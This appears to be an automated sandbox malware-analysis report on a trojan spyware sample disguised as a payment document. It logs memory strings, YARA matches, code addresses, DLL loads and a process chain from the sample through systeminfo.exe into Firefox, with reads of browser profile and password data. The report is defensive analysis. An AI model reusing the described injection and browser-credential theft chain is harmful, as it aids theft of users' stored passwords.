                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/web-sencilla?utm_source=parking&amp;utm_medium=link&amp;utm_campaign
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=piensa
                Source: oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002D48000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de
                Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/cloudhost/
                Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/jiaoyi/
                Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/domain/
                Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/mail/
                Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/webhosting/
                Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/ykj/view.asp?domain=cotti.club

                E-Banking Fraud

                Source: Yara match, File source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE

                System Summary

                Source: initial sample, Static PE information: Filename: Payment&WarantyBonds.exe
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014307702_2_01430770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142C7C02_2_0142C7C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EF7B02_2_014EF7B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E16CC2_2_014E16CC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144C6E02_2_0144C6E0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014399502_2_01439950
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144B9502_2_0144B950
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014469622_2_01446962
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014329A02_2_014329A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014FA9A62_2_014FA9A6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014328402_2_01432840
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143A8402_2_0143A840
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0149D8002_2_0149D800
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014338E02_2_014338E0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145E8F02_2_0145E8F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014168B82_2_014168B8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EAB402_2_014EAB40
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EFB762_2_014EFB76
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E6BD72_2_014E6BD7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A5BF02_2_014A5BF0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0146DBF92_2_0146DBF9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144FB802_2_0144FB80
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EFA492_2_014EFA49
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E7A462_2_014E7A46
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A3A6C2_2_014A3A6C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DDAC62_2_014DDAC6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142EA802_2_0142EA80
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014CDAAC2_2_014CDAAC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01475AA02_2_01475AA0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01433D402_2_01433D40
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E1D5A2_2_014E1D5A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E7D732_2_014E7D73
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143AD002_2_0143AD00
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144FDC02_2_0144FDC0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142ADE02_2_0142ADE0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01448DBF2_2_01448DBF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01430C002_2_01430C00
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A9C322_2_014A9C32
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01420CF22_2_01420CF2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EFCF22_2_014EFCF2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0CB52_2_014D0CB5
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A4F402_2_014A4F40
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EFF092_2_014EFF09
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01472F282_2_01472F28
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01450F302_2_01450F30
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01422FC82_2_01422FC8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01431F922_2_01431F92
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EFFB12_2_014EFFB1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01430E592_2_01430E59
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EEE262_2_014EEE26
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EEEDB2_2_014EEEDB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01442E902_2_01442E90
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014ECE932_2_014ECE93
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01439EB02_2_01439EB0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0481E4F67_2_0481E4F6
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048144207_2_04814420
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048224467_2_04822446
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048305917_2_04830591
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047705357_2_04770535
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0478C6E07_2_0478C6E0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047707707_2_04770770
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047947507_2_04794750
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0476C7C07_2_0476C7C0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048020007_2_04802000
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048241A27_2_048241A2
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047F81587_2_047F8158
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048301AA7_2_048301AA
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048281CC7_2_048281CC
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047601007_2_04760100
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0480A1187_2_0480A118
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047F02C07_2_047F02C0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048102747_2_04810274
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048303E67_2_048303E6
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0477E3F07_2_0477E3F0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482A3527_2_0482A352
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04810CB57_2_04810CB5
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04770C007_2_04770C00
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04760CF27_2_04760CF2
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0477AD007_2_0477AD00
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0476ADE07_2_0476ADE0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0480CD1F7_2_0480CD1F
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04788DBF7_2_04788DBF
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482CE937_2_0482CE93
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04770E597_2_04770E59
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482EEDB7_2_0482EEDB
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482EE267_2_0482EE26
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04782E907_2_04782E90
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047E4F407_2_047E4F40
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04790F307_2_04790F30
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047B2F287_2_047B2F28
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04812F307_2_04812F30
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04762FC87_2_04762FC8
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047EEFA07_2_047EEFA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047728407_2_04772840
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0477A8407_2_0477A840
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0479E8F07_2_0479E8F0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047568B87_2_047568B8
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047869627_2_04786962
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0483A9A67_2_0483A9A6
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047729A07_2_047729A0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0476EA807_2_0476EA80
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04826BD77_2_04826BD7
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482AB407_2_0482AB40
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047614607_2_04761460
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482F43F7_2_0482F43F
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0480D5B07_2_0480D5B0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048275717_2_04827571
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048216CC7_2_048216CC
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482F7B07_2_0482F7B0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0481F0CC7_2_0481F0CC
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482F0E07_2_0482F0E0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048270E97_2_048270E9
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047770C07_2_047770C0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0475F1727_2_0475F172
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A516C7_2_047A516C
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0477B1B07_2_0477B1B0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0483B16B7_2_0483B16B
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048112ED7_2_048112ED
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0478D2F07_2_0478D2F0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0478B2C07_2_0478B2C0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047752A07_2_047752A0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0475D34C7_2_0475D34C
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482132D7_2_0482132D
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047B739A7_2_047B739A
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047E9C327_2_047E9C32
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482FCF27_2_0482FCF2
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04773D407_2_04773D40
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0478FDC07_2_0478FDC0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04821D5A7_2_04821D5A
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04827D737_2_04827D73
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04779EB07_2_04779EB0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482FFB17_2_0482FFB1
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482FF097_2_0482FF09
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04733FD27_2_04733FD2
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04733FD57_2_04733FD5
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04771F927_2_04771F92
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047DD8007_2_047DD800
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047738E07_2_047738E0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047799507_2_04779950
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0478B9507_2_0478B950
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048059107_2_04805910
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047E3A6C7_2_047E3A6C
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04811AA37_2_04811AA3
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0480DAAC7_2_0480DAAC
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0481DAC67_2_0481DAC6
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04827A467_2_04827A46
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482FA497_2_0482FA49
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047B5AA07_2_047B5AA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047ADBF97_2_047ADBF9
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047E5BF07_2_047E5BF0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482FB767_2_0482FB76
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0478FB807_2_0478FB80
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_00561CA07_2_00561CA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0055CBF77_2_0055CBF7
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0055CC007_2_0055CC00
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0055CE207_2_0055CE20
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0055AEA07_2_0055AEA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005653007_2_00565300
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005634F97_2_005634F9
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005635407_2_00563540
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0056353B7_2_0056353B
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0057B8D07_2_0057B8D0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0465E73C7_2_0465E73C
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0465E2847_2_0465E284
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0465E3A37_2_0465E3A3
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0465D8087_2_0465D808
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: String function: 0149EA12 appears 86 times
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: String function: 0141B970 appears 250 times
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: String function: 01477E54 appears 93 times
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: String function: 014AF290 appears 103 times
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: String function: 01465130 appears 36 times
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 047A5130 appears 58 times
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 047EF290 appears 103 times
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 047DEA12 appears 86 times
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 0475B970 appears 262 times
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 047B7E54 appears 99 times
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1747632834.0000000004405000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1752667969.000000000B480000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000000.00000000.1682657337.00000000006FC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamejmUl.exe8 vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1745782038.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000002.00000002.2062877202.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesysinfo.exej% vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000002.00000002.2062877202.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesysinfo.exej% vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000002.00000002.2063188272.000000000151D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe Binary or memory string: OriginalFilenamejmUl.exe8 vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Payment&WarantyBonds.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: _0020.SetAccessControl
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: _0020.AddAccessRule
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, cILh9bHvx4dPN3VnUI.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, cILh9bHvx4dPN3VnUI.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: _0020.SetAccessControl
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: _0020.AddAccessRule
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, cILh9bHvx4dPN3VnUI.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: _0020.SetAccessControl
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: _0020.AddAccessRule
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@18/14
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment&WarantyBonds.exe.log
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\systeminfo.exe File created: C:\Users\user\AppData\Local\Temp\4648H9mUM
                Source: Payment&WarantyBonds.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: systeminfo.exe, 00000007.00000003.2251386954.0000000000976000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4147496833.0000000000976000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Payment&WarantyBonds.exe ReversingLabs: Detection: 23%
                Source: unknown Process created: C:\Users\user\Desktop\Payment&WarantyBonds.exe "C:\Users\user\Desktop\Payment&WarantyBonds.exe"
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process created: C:\Users\user\Desktop\Payment&WarantyBonds.exe "C:\Users\user\Desktop\Payment&WarantyBonds.exe"
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"
                Source: C:\Windows\SysWOW64\systeminfo.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: windowscodecs.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: framedynos.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: winhttp.dll
